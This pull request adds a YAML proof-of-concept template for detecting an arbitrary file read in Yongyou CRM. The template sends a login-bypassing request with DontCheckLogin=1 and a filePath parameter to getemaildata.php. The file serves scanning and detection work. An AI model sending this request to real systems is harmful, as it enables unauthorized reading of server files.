### PR TITLE
yongyou_crm_file_read

### DIFF
--- a/pocs/poc-yaml-yongyou-crm-file-read.yml
+++ b/pocs/poc-yaml-yongyou-crm-file-read.yml
@@ -1,4 +1,4 @@
-name: yongyou_crm_file_read
+name: poc-yaml-yongyou-crm-file-read
 rules:
   - method: GET
     path: "/ajax/getemaildata.php?DontCheckLogin=1&filePath=./getemaildata.php"

--- a/pocs/yongyou_crm_file_read.yml
+++ b/pocs/yongyou_crm_file_read.yml
@@ -1,0 +1,10 @@
+name: yongyou_crm_file_read
+rules:
+  - method: GET
+    path: "/ajax/getemaildata.php?DontCheckLogin=1&filePath=./getemaildata.php"
+    expression: |
+      response.body.bcontains(bytes("crm_include"))
+detail:
+  author: 0d9y
+  links:
+    - https://www.seebug.org/vuldb/ssvid-90525


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
用友CRM系统 getemaildata.php 任意文件读取
## 备注
由于该版本用友CRM系统 getemaildata.php页面filePath参数因权限校验不严格导致系统任意文件读取漏洞。
https://www.seebug.org/vuldb/ssvid-90525
